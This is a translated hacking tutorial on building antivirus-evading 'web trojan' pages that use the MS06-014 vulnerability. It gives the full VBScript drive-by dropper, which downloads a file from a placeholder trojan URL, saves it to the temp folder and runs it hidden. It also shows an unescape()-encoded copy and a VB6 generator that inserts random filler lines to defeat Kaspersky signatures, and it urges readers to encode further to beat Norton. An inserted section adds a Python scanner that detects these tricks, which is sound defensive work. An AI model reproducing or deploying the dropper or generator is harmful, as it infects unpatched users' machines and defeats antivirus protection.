Recently I became interested in making antivirus-evading web trojans, so I dug up the code of the ms06014 web trojan to study it and noticed a few things. The code is as follows:
<html>
<script language="VBScript">
on error resume next
dl = "http://木马地址"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>人鱼姬ms06014</title>
</head><body>
<center></center>
</body></html>
Would the Unicode encoding that is fairly common nowadays evade detection? The encoded code is as follows:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3Chtml%3E%0D%0A%20%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%20%20%20%20dl%20%3D%20%22http%3A//%u6728%u9A6C%u5730%u5740%22%0D%0A%20%20%20%20Set%20df%20%3D%20document.createElement%28%22object%22%29%0D%0A%20%20%20%20df.setAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22%0D%0A%20%20%20%20str%3D%22Microsoft.XMLHTTP%22%0D%0A%20%20%20%20Set%20x%20%3D%20df.CreateObject%28str%2C%22%22%29%0D%0A%20%20%20%20a1%3D%22Ado%22%0D%0A%20%20%20%20a2%3D%22db.%22%0D%0A%20%20%20%20a3%3D%22Str%22%0D%0A%20%20%20%20a4%3D%22eam%22%0D%0A%20%20%20%20str1%3Da1%26a2%26a3%26a4%0D%0A%20%20%20%20str5%3Dstr1%0D%0A%20%20%20%20set%20S%20%3D%20df.createobject%28str5%2C%22%22%29%0D%0A%20%20%20%20S.type%20%3D%201%0D%0A%20%20%20%20str6%3D%22GET%22%0D%0A%20%20%20%20x.Open%20str6%2C%20dl%2C%20False%0D%0A%20%20%20%20x.Send%0D%0A%20%20%20%20fname1%3D%22g0ld.com%22%0D%0A%20%20%20%20set%20F%20%3D%20df.createobject%28%22Scripting.FileSystemObject%22%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F.GetSpecialFolder%282%29%20%0D%0A%20%20%20%20fname1%3D%20F.BuildPath%28tmp%2Cfname1%29%0D%0A%20%20%20%20S.open%0D%0A%20%20%20%20S.write%20x.responseBody%0D%0A%20%20%20%20S.savetofile%20fname1%2C2%0D%0A%20%20%20%20S.close%0D%0A%20%20%20%20set%20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%20%20%20%20%3C/script%3E%0D%0A%20%20%20%20%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3E%u4EBA%u9C7C%u59ECms06014%3C/title%3E%0D%0A%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A%09%3Ccenter%3E%3C/center%3E%0D%0A%20%20%20%20%3C/body%3E%3C/html%3E%0D%0A"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
Scanning it with Kaspersky, as shown in Figure 1, it appears on the surface to be undetected.
So Unicode encoding is not viable; it does not fully evade detection. The code before encoding contains a VBScript error-handling statement, on error resume next, which means that if a statement fails, no error is raised and execution simply continues with the next statement. Can we make use of that somehow? Based on this I designed an ms06014 web trojan generator, written in VB, intended to evade Kaspersky permanently. The principle is to generate a large number of random strings and interleave them between the lines of VBScript, which confuses the antivirus. Because the randomly generated strings are guaranteed to fail when executed, the error-handling statement makes execution move on to the next statement without affecting the VBScript itself. Conceptually this kind of web trojan generator is quite sound: since the interleaved strings are random, every generated web trojan is different, Kaspersky cannot extract a specific signature, and each generated web trojan can be regarded as an undetected personal edition. The key code of the program is as follows:
Private Sub Command1_Click()
a = FreeFile() 'get a free file number
Open ".\renyuji.htm" For Output As #a 'open renyuji.htm in the current directory, creating it if it does not exist
Print #a, "<html>"
Print #a, "<script language=""VBScript"">"
Print #a, "on error resume next"
Call suiji(a) 'starting at the error-handling statement, call the suiji() procedure after every line of code to add filler code to the file
Print #a, "dl = """ & Text2.Text & """" 'note: every quotation mark that appears in the web page must be written as two quotation marks here so it is output correctly
Call suiji(a)
Print #a, "Set df = document.createElement(""object"")"
Call suiji(a)
Print #a, "df.setAttribute ""classid"", ""clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"""
Call suiji(a)
Print #a, "str=""Microsoft.XMLHTTP"""
Call suiji(a)
Print #a, "Set x = df.CreateObject(str,"""")"
Call suiji(a)
Print #a, "a1=""Ado"""
Call suiji(a)
Print #a, "a2=""db."""
Call suiji(a)
Print #a, "a3=""Str"""
Call suiji(a)
Print #a, "a4=""eam"""
Call suiji(a)
Print #a, "str1=a1&a2&a3&a4"
Call suiji(a)
Print #a, "str5=str1"
Call suiji(a)
Print #a, "set S = df.createobject(str5,"""")"
Call suiji(a)
Print #a, "S.type = 1"
Call suiji(a)
Print #a, "str6=""GET"""
Call suiji(a)
Print #a, "x.Open str6, dl, False"
Call suiji(a)
Print #a, "x.Send"
Call suiji(a)
Print #a, "fname1=""g0ld.com"""
Call suiji(a)
Print #a, "set F = df.createobject(""Scripting.FileSystemObject"","""")"
Call suiji(a)
Print #a, "set tmp = F.GetSpecialFolder(2) "
Call suiji(a)
Print #a, "fname1= F.BuildPath(tmp,fname1)"
Call suiji(a)
Print #a, "S.open"
Call suiji(a)
Print #a, "S.write x.responseBody"
Call suiji(a)
Print #a, "S.savetofile fname1,2"
Call suiji(a)
Print #a, "S.close"
Call suiji(a)
Print #a, "set Q = df.createobject(""Shell.Application"","""")"
Call suiji(a)
Print #a, "Q.ShellExecute fname1,"""","""",""open"",0"
Call suiji(a)
Print #a, "</script>" 'the VBScript ends here, so no more filler code is added
Print #a, "<head>"
Print #a, "<title>人鱼姬ms06014</title>"
Print #a, "</head><body>"
Print #a, "<center></center>"
Print #a, "</body></html>"
Close #a 'close the file; never forget this
MsgBox "已经在当前目录下生成renyuji.htm ", 64, "人鱼姬提示"
End Sub
Public Sub suiji(a)
'This procedure writes the specified number of lines of randomly generated strings, made up of upper- and lower-case letters, to the file. In ASCII, A~Z is 65~90 and a~z is 97~122
Dim b, e, g As Integer
Dim d As String
e = Text1.Text 'get the number of lines of filler code entered by the user
g = Text3.Text 'get the number of characters per line of filler code entered by the user
For f = 1 To e 'each iteration writes one line of filler code; the number of lines is set by the user's input
d = ""
For c = 1 To g 'each iteration appends one random letter to d; the number of characters is set by the user's input
Randomize 'seed the random number generator
b = Fix(65 + Rnd * 58) 'generate a random number in 65~122
While (90 < b And b < 97) 'if it falls between 90 and 97, try again, so the result lies in 65~90 or 97~122
Randomize
b = Fix(65 + Rnd * 58)
Wend
d = d & Chr$(b) 'append the randomly generated letter to d
Next c
Print #a, d 'write one line of filler code
Next f
End Sub
After the program is finished, the final interface is shown in Figure 3. After entering the trojan URL and clicking the "Generate" button, the generated web trojan code looks like this:
<html>
<script language="VBScript">
on error resume next
OishnyffWHfEScObRWtgdqnMf
GNIVZkHJUZARgCYSGjtusyhhP
otwmOXFloLkpFQixjZyXVvate
dl = "http://"
iLivoJFxZQLYlCMXrlSUyVeYB
MMKQkrzbqpHLOFbsjYDGDIXTA
PmmQiNdMhBBNHIcPclEUjJDeg
...code omitted...
set Q = df.createobject("Shell.Application","")
DAFUaxMyjNgfKpJtyyKEYVoNi
iBRjgGBbdOektiRzHPrFEWUqH
zhTVmSXhdQBBajxswQnQWkYrl
Q.ShellExecute fname1,"","","open",0
rnATemoyZTuwahDMAdcRZbuXX
jaXtZCzfYpekvccTUsBPpLoOc
qdaZnkJrDKFSfhEGRlWxOsAVS
</script>
<head>
<title>人鱼姬ms06014</title>
</head><body>
<center></center>
</body></html>
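Seen from the defender's side, neither of the two tricks in this post (the unescape()-wrapped payload and the random filler lines that depend on on error resume next) touches the page's real indicators. The Python scanner below is an added example, not code from the post or its author. It decodes escaped string literals the way JavaScript's unescape() does, folds VBScript string concatenations such as a1&a2&a3&a4 back into the object name they hide, and counts lines consisting of a lone identifier that occurs nowhere else in the script, which is exactly what the generator's filler looks like. The sample page it scans is constructed here from the CLSID and filler strings in the post's listings, with the download/write/execute chain left out; all function and variable names are my own.

```python
"""Scan an HTML page for a VBScript dropper hidden behind unescape()-encoded
strings and random filler lines. Added example; helper names are assumed."""
import re
from collections import Counter

# Indicator strings taken from the post's listings: the CLSID its exploit page
# instantiates, the error-swallowing statement the filler relies on, and the
# COM object names it uses (one of them split across four variables).
INDICATORS = [
    "BD96C556-65A3-11D0-983A-00C04FC29E36",
    "on error resume next",
    "Microsoft.XMLHTTP",
    "Adodb.Stream",
    "Scripting.FileSystemObject",
    "Shell.Application",
    "savetofile",
    "ShellExecute",
]

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
STRING_RE = re.compile(r'"([^"\n]*)"|\'([^\'\n]*)\'')
ASSIGN_LIT_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"\n]*)"\s*$', re.M)
ASSIGN_CAT_RE = re.compile(r"^\s*(\w+)\s*=\s*([\w& \t]+)$", re.M)
BARE_RE = re.compile(r"^[A-Za-z]\w*$")


def js_unescape(text):
    """Decode %XX and %uXXXX sequences like JavaScript's legacy unescape()."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def js_escape(text):
    """Inverse of js_unescape; used only to build the constructed sample page."""
    return "".join(
        c if c.isascii() and c.isalnum()
        else ("%%%02X" % ord(c) if ord(c) < 256 else "%%u%04X" % ord(c))
        for c in text)


def unwrap_layers(html, max_depth=4):
    """Return the page plus the decoded contents of every escaped string
    literal found in it, recursively, so encoded payloads are scanned in clear."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):
        decoded = []
        for layer in frontier:
            for m in STRING_RE.finditer(layer):
                literal = m.group(1) if m.group(1) is not None else m.group(2)
                if ESCAPE_RE.search(literal):
                    decoded.append(js_unescape(literal))
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    return layers


def fold_strings(script):
    """Resolve VBScript variables built from string literals and '&' joins
    (a1="Ado" ... str1=a1&a2&a3&a4, str5=str1) to their final values."""
    consts = dict(ASSIGN_LIT_RE.findall(script))
    for _ in range(8):  # a few passes resolve chains of aliases
        changed = False
        for name, expr in ASSIGN_CAT_RE.findall(script):
            parts = [p.strip() for p in expr.split("&")]
            if name not in consts and all(p in consts for p in parts):
                consts[name] = "".join(consts[p] for p in parts)
                changed = True
        if not changed:
            break
    return consts


def filler_lines(script):
    """Lines consisting of one identifier that appears nowhere else in the
    script: never assigned, never referenced, present only to fail silently."""
    words = Counter(re.findall(r"\w+", script))
    return [ln.strip() for ln in script.splitlines()
            if BARE_RE.match(ln.strip()) and words[ln.strip()] == 1]


def scan(html):
    """Report which indicators survive de-obfuscation and how much filler there is."""
    layers = unwrap_layers(html)
    resolved, filler = [], 0
    for layer in layers:
        resolved.extend(fold_strings(layer).values())
        filler += len(filler_lines(layer))
    haystack = ("\n".join(layers) + "\n" + " ".join(resolved)).lower()
    return {"indicators": [i for i in INDICATORS if i.lower() in haystack],
            "filler_lines": filler}


# Constructed sample: a cut-down script body using the CLSID and filler strings
# from the post's listings, without the download/write/execute chain.
SAMPLE_VBS = """on error resume next
OishnyffWHfEScObRWtgdqnMf
Set df = document.createElement("object")
GNIVZkHJUZARgCYSGjtusyhhP
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
otwmOXFloLkpFQixjZyXVvate
str="Microsoft.XMLHTTP"
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
PmmQiNdMhBBNHIcPclEUjJDeg
str5=str1
set S = df.createobject(str5,"")
"""

# The same body wrapped the way the post's second listing wraps it.
ENCODED_PAGE = ('<HTML><SCRIPT LANGUAGE="Javascript">\n'
                'var Words = "' + js_escape('<script language="VBScript">\n'
                                            + SAMPLE_VBS + '</script>') + '";\n'
                'document.write(unescape(Words));\n</SCRIPT></HTML>')

if __name__ == "__main__":
    print(scan(ENCODED_PAGE))
```

Indicator matching runs over the decoded and folded text, so neither the percent-encoding nor the split-up object name hides anything; the filler count is a useful anomaly on its own, because ordinary VBScript has no reason to contain lines made of a single identifier that is never assigned or referenced.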
Testing showed that it works normally on a machine with Kaspersky installed and without the ms06014 patch. Unfortunately, web trojans encoded this way are still detected and removed by Norton; you can build on this and apply further encoding yourselves to push evasion further. In addition, both the number of characters and the number of lines of filler code in the tool are configurable and can be chosen as needed. This evasion method actually has quite a wide range of application, and I hope everyone can master it well.